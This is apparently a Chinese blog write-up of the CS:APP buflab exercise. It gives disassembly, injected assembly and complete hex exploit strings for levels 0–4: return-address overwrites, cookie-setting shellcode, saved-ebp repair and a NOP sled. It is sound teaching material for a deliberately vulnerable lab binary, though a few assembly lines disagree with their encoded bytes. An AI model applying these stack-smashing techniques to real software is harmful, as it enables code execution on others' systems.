lab3 buflab。一个训练你利用buffer漏洞干一些非法的事情(狐狸脸ing)的lab。。
总体难度比上一个lab 即bomb lab简单一些,只要弄清楚buffer的原理还是比较容易做的。
08048ca4 <getbuf>: 8048ca4: 55 push %ebp 8048ca5: 89 e5 mov %esp,%ebp 8048ca7: 83 ec 38 sub $0x38,%esp 8048caa: 8d 45 d8 lea -0x28(%ebp),%eax<-buffer共0x28byte 8048cad: 89 04 24 mov %eax,(%esp) 8048cb0: e8 3c ff ff ff call 8048bf1 <Gets> 8048cb5: b8 01 00 00 00 mov $0x1,%eax 8048cba: c9 leave 8048cbb: c3 ret0x28+0x4(<main>retaddr)+0x4(saved %esp)构成了getbuf的栈结构,具体结构图如下:
level 0:
Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement,rather than returning to test
08049174 <smoke>: 8049174: 55 push %ebp 8049175: 89 e5 mov %esp,%ebp那么把retaddr替换成08 04 91 74(注意little endian)即可
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
74 91 04 08
level 1:
your task is to get BUFBOMB to execute the code for fizz rather than returning to test.
08049129 <fizz>: 8049129: 55 push %ebp 804912a: 89 e5 mov %esp,%ebp 804912c: 83 ec 18 sub $0x18,%esp 804912f: 8b 45 08 mov 0x8(%ebp),%eax 8049132: 3b 05 c4 b1 04 08 cmp 0x804b1c4,%eax 8049138: 75 1e jne 8049158 <fizz+0x2f> 804913a: 89 44 24 04 mov %eax,0x4(%esp)
在<fizz>中先push %ebp 此时ebp位置在retaddr,那么0x8(%ebp)就是在栈顶下面的位置。
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
29 91 04 08
00 00 00 00
80 e9 ad 51
level 2:
your task is to get BUFBOMB to execute the code for bang rather than returning to test
080490dc <bang>: 80490dc: 55 push %ebp 80490dd: 89 e5 mov %esp,%ebp 80490df: 83 ec 18 sub $0x18,%esp 80490e2: a1 cc b1 04 08 mov 0x804b1cc,%eax 80490e7: 3b 05 c4 b1 04 08 cmp 0x804b1c4,%eax 80490ed: 75 1e jne 804910d <bang+0x31>
从这题开始难度增加,查看<bang>函数,要把内存中的0x804b1cc 中的值取出来与0x804b1c4(这个上一题已经得出是cookie值)比较,查看0x804b1cc,发现是一个<.global_value>,那么就要修改这个值,使其变成cookie值,写一段攻击代码如下:
movl $0x51ade980,%eax movl %eax,0x804b1cc <-更改global_value的值 pushl $0x80490dc <-将bang作为retaddr压栈 ret利用gcc编译后得到.o文件再反编译得到其二进制代码,填入buffer,注意,还要查找到the start of input string来作为第一次retaddr,那么程序就从第一次return到我们输入的字符串,然后执行我们的攻击代码,再进入<bang>,完成任务。
查找start of input string的方法是在<getbuf>中设置断点(关于gdb使用请参考上一篇博文,关于bomb lab的那篇),查找-0x28(%ebp)的地址(这个地址是我们输入的buffer区的起始位置)
c7 05 cc b1 04 08 80 e9
ad 51 68 dc 90 04 08 c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 48 3b 68 55
level 3:
Your job for this level is to supply an exploit string that will cause getbuf to return your cookie back to test, rather than the value 1.
08048d25 <test>: 8048d25: 55 push %ebp 8048d26: 89 e5 mov %esp,%ebp 8048d28: 53 push %ebx 8048d29: 83 ec 24 sub $0x24,%esp 8048d2c: e8 9f fe ff ff call 8048bd0 <uniqueval> 8048d31: 89 45 f4 mov %eax,-0xc(%ebp) 8048d34: e8 6b ff ff ff call 8048ca4 <getbuf> 8048d39: 89 c3 mov %eax,%ebx
movl 0x51ade980,%eax pushl 0x8048d39 ret
按照上题提供方法得到二进制代码即可。另外,这个题因为是要按正常方式返回原函数,那么我们要保证saved ebp的值是正确的。saved ebp就是<getbuf>中的ebp值,同样使用gdb设置断点调试可以得到。按照栈结构将所得到的数据输入即可得到答案。
b8 80 e9 ad
51 68 39 8d
04 08 c3 00<-attack code
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
a0 3b 68 55<-saved ebp
48 3b 68 55<-start of input string
level 4:
Your task is identical to the task for the Dynamite level. Once again, your job for this level is to supply an exploit string that will cause getbufn to return your cookie back to test, rather than the value 1.
08048c86 <getbufn>: 8048c86: 55 push %ebp 8048c87: 89 e5 mov %esp,%ebp 8048c89: 81 ec 18 02 00 00 sub $0x218,%esp 8048c8f: 8d 85 f8 fd ff ff lea -0x208(%ebp),%eax 8048c95: 89 04 24 mov %eax,(%esp) 8048c98: e8 54 ff ff ff call 8048bf1 <Gets> 8048c9d: b8 01 00 00 00 mov $0x1,%eax 8048ca2: c9 leave 8048ca3: c3 ret我们可以得到这个栈空间是0x208+0x4+0x4的,结构同上。整个buffer共有528byte。
08048cbc <testn>: 8048cbc: 55 push %ebp 8048cbd: 89 e5 mov %esp,%ebp 8048cbf: 53 push %ebx 8048cc0: 83 ec 24 sub $0x24,%esp 8048cc3: c7 45 f4 ef be ad de movl $0xdeadbeef,-0xc(%ebp) 8048cca: e8 b7 ff ff ff call 8048c86 <getbufn> 8048ccf: 89 c3 mov %eax,%ebx
再查看新的<testn>,我们要完成任务,首先要复原%ebp内容,从<testn>函数中看出来这时的ebp应当是esp+0x24+0x4(push ebx)=esp+0x28.然后在将cookie赋值填入eax中
leal -0x28(%esp),%ebp movl 0x51ade980,%eax push $8048ccf ret
并将其按编译-反编译.o文件得到其二进制代码此外,由于每次栈的不确定性,我们需要先空执行程序,利用上面同样的方法查找到每次的start of input string。找到5个之后,(可能有相同的,不影响结果,这个可以认为是有两次执行的栈结构相同),为了使每一次input string都能完整被读入,我们就要选择最大的一个数据作为我们整个攻击代码的start of input string。至此,我们解决了大部分问题,最后,为了使每一个开始的位置都能进入我们的attack code 我们需要把文件的其他地方用nop(90)填充,这样才能使每次无论buffer的位置在哪里,都能滑到我们的攻击代码中。得到答案:
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
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90 90 90 90
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90 90 90 90
90 90 90 90
90 90 90 90
90 90 90 90
8d 6c 24 28
b8 80 e9 ad
51 68 cf 8c
04 08 c3 00
90 90 90 90
90 90 90 90
00 00 00 00<-saved ebp,由attack code 得到
a8 39 68 55